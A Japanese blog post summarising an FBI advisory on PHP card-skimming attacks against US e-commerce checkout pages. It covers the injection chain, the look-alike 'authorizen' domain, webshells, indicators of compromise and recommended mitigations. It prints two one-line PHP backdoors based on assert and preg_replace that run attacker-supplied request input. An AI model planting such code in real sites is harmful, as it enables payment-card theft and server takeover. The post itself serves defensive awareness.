米国企業のオンライン決済ページ経由での侵害に関して

仕事
Qちゃん
Qちゃん

おはようございます、こんにちは、こんばんは

Qちゃんです。

FBIが米国企業のオンライン決済ページからクレジットカード情報を取得し、悪意のあるPHPコードを注入する攻撃が頻発すると警鐘を鳴らしています。

内容をまとめてみたのでご覧ください。

概要

2022年1月現在、正体不明のサイバー犯罪者が、悪意のあるPHP(Hypertext Preprocessor)コードを企業のオンラインチェックアウトページに注入し、正規のカード処理サーバーになりすまし、このサイバー犯罪者の管理するサーバーにスクレイピングデータを送信し、米国の企業からクレジットカードデータを違法に取得するという侵害が発生しています。
正体不明のサイバー犯罪者は、チェックアウトページ内の2つのファイルを変更することで、被害者のシステムへのバックドア・アクセスも確立していました。
FBIは、ネットワーク防御に役立つ可能性のある新たな侵入痕跡(indicators of compromise)を特定し、共有しています。

引用:https://www.ic3.gov/Media/News/2022/220516.pdf

技術詳細

正体不明のサイバー犯罪者は、2020年9月、80.249.207.19、80.82.64.211、80.249.206.197という3つのIPアドレスから米国の企業を標的に攻撃を開始しました。
この犯罪者は、関連するTempOrders.phpファイルを変更することで、同ビジネスのカスタマイズされたオンラインチェックアウトページ、checkout.phpに悪意のあるPHPコードを挿入しました。
チェックアウトページは、以下のinclude()ステートメントで修正されています。

include()ステートメントを使用すると、あるファイルから別のファイルへPHPコードをインポートすることができます。
これにより、開発者がコードを更新するために変更しなければならないファイル数を減らすことができます。
悪意のある犯罪者は、この機能を利用して、TempOrders.php の内容をチェックアウトの cart_required_files.php ファイルを挿入していました。
この cart_required_files.php ファイルには、include() とほぼ同じ require_once() 文が含まれていますが、特定したファイルが見つからない場合、警告が表示され、プログラムの実行が継続される点が異なります。

2022年1月時点で、正体不明のサイバー犯罪者はrequire_once()関数を使用してTempOrders.phpファイルを呼び出し実行し、米国企業のショッピングカートから顧客データをスクレイピングして、被害者のカード情報を盗難するための被害者専用のPHPファイル「file_name.php」を取得するためのコードが記載されていました。

この悪質なコードは、顧客の決済情報を、カード処理会社のドメインである http://authorize[.]net/ になりすますために「n」が追加された、なりすましカード処理ドメイン http://authorizen[.]net/ として投稿します。
また、正体不明のサイバー犯罪者は、2つのファイルを変更することで、同企業のシステムへのバックドア・アクセスを確立しました。
まず、assert($_REQUEST[‘login’])関数を挿入し、初歩的なバックドアを構築しました。
この関数は、デバッグ用に設計されており、呼び出されると、HTTPリクエストパラメータ「login」として送信されたコードが実行されます。この関数を実行すると、P.A.S.の完全な機能を持つWebシェルが被害企業のWebサーバーにダウンロードされます。

次に、この犯罪者はPHPの正規表現@preg_replace(“/f/e”,$_GET[‘u’], “fengjiao”)を挿入しました。これは、HTTPリクエスト変数「u」として提出されたPHPコードを挿入し実行するように設計されています。

この技術を使って、2つのPHP Webshell、P.A.S.とb374をダウンロードし、バックドアとして活用することで、さらなる悪用が可能になりました。

IOC(侵入痕跡)

脆弱性攻撃およびデータ流出において、以下のIPアドレスおよびURLが使用されました。

IP AddressesUniform Resource Locators (URLs)  
80.249.207.19N/A
80.82.64.211N/A
80.249.206.197N/A

キャプション侵入の際に使用されたマルウェアツールは以下の通りです。

Filenamepas.php
MD5:73B4EF0EDA0BF07EF4DC1C543F668018
SHA256:Ac28e5f136e9307d965466f77cf0845dc4cf08a701323ab4fbc66d91b28cfab9
SHA1:6f81a02b802d17e9dc7fc846eb1ce8f14e10b813
File Size:15.68 KB (16059 bytes)
File Type:Unknown
Note:P.A.S. webshell (aka Fobushell) was developed and published by Ukrainian developer Jaroslav Volodimirovich Panchenko (aka Profexer). In December 2016, the Department of Homeland Security published a report concerning attacks on the 2016 U.S. elections, which identified P.A.S. as a tool used by Russian Intelligence Services (referenced by the DHS as “GRIZZLY STEPPE”).
Filenamelog.php
MD5:0D43648311AC978702538CF1AC4E1257
SHA256:9a0023406283d9856b07b2d39b4444130001f86131841df2eba206f0ae379b6c
SHA1:595ce84634536b3a2cc0d6dd05af7003ce8ed04a
File Size:97.23 KB (99559 bytes)
File Type:PHP
Note:This was a webshell published at Github.com/b374k/b374k.
FilenameIndex.php
MD5:05A7373DAA77917128535C76B2B363FE
SHA256:0b754dee14703b23b97dbb50baa5b83931003f0744822eb6a76b0291fb1e6587
SHA1:5d46d944af2a9dda829a653856c7ea9ec723dfc5
File Size:206.25 KB (211204 bytes)
File Type:unknown
Note:Adminer is a legitimate PHP-based database tool. This tool is commonly used for managing content in MySQL databases, but it should not be exposed to the public as a general security practice.

PHPコード
以下のPHPコードは、正体不明のサイバー犯罪者が標的企業のコードをどのように変更したかの一例です。
最初の3行、”$this “で始まる行は、同社のショッピングカートの実際のコードであり、残りの “curl “で始まる行は、犯罪者が追加したものです。

推奨する緩和策

  • OS(オペレーティングシステム)、ソフトウェア、ウェブサイトの一部として実行されているサードパーティのコードを含む、すべてのシステムの更新とパッチを適用する。
  • すべてのシステムでデフォルトのログイン情報を変更する。
  • eコマース環境に対して実行されるリクエストを監視し、悪意のある行動を特。
  • ネットワークシステムを分離・分割し、サイバー犯罪者が簡単に別のシステムに移動できないように制限する。
  • SSL(セキュアソケットレイヤー)プロトコルを使用して、機密情報を送信するすべてのWebサイトを保護する。
  • サードパーティ製のソフトウェア/ハードウェアは、信頼できる提供元からインストールする。
    製造元と連携し、保存・処理されるデータへの不正アクセスを防止するセキュリティプロトコルを確立する。
  • インターネットに接続されたサーバーの既知の脆弱性、及びウェブブラウザ、ブラウザプラグイン、文書リーダーなどのインターネットデータを処理するソフトウェアを優先して、すべてのシステムに重要な脆弱性のパッチを適時に適用する。
  • ウェブログやウェブアプリケーションを積極的にスキャンし、不正アクセスや改ざん、異常な動作がないか監視する。
  • 個人アカウント保護のため、クレデンシャル要件を強化し、多要素認証を導入する。
  • セキュリティ侵害やサイバー侵入があった場合の復旧時間を短縮するため、定期的なバックアップを実施する。
  • サイバー脅威への対応として、最新のインシデント対応計画を維持する。

おわりに

Qちゃん
Qちゃん

米国にはなりますが、オンライン決済ページからクレジットカード情報の搾取、そしてその企業への永続的な侵入とかなり悪質な攻撃を実施しています。

対象企業の方はFBIが推奨する緩和策を導入し、被害を最小限に抑えて下さい。

コメント

タイトルとURLをコピーしました